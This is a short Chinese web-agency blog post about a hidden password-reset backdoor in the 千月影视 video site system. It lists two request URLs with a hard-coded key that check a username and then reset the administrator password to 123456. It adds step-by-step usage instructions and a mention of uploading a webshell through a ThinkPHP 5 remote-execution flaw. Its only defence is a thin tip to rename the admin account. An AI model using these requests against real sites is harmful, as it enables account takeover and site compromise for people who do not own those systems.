互联网知识

精准传达 • 价值共享

洞悉互联网前沿资讯,探寻网站营销规律

查看其它板块

千月影视HouMen

作者:狐灵安全组 | 2019-06-14 10:48 |点击:


给你们解释一下 第一段代码是判断 用户名是否存在 第二段是修改 不光可以修改 管理员密码 还可以修改代[过滤]理 知道用户名就可以

因为时间问题 这里我说一下 千月用的是tp5 框架还有 远程执行漏洞 直接放大马

这个应该是作者原本留的防止忘记密码 但是被黑客利用了 


  1. 域名+/login/login/yzcode?username=admin&key=465454&password=123456
  2.  
  3.  
  4. 域名+/login/login/repass?username=admin&key=465454&password=123456
复制代码


使用方法:我们先运行第一段代码,如果显示成功,就是可以改密码,然后我们在运行第二段代码就可以了。

然后账号密码就变成admin 123456

预防方法:我们把管理员用户名更改一下,不要让别人知道就改不了,我演示是给大家看
如没特殊注明,文章均为狐灵科技原创,转载请注明  https://www.hulingweb.cn/hulianwang/424.html
多一份免费策划方案,总有益处。

请直接添加技术总监微信联系咨询

网站设计 品牌营销

多一份参考,总有益处

联系狐灵科技,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

业务热线:023-68168040 / 大客户专线:15523356218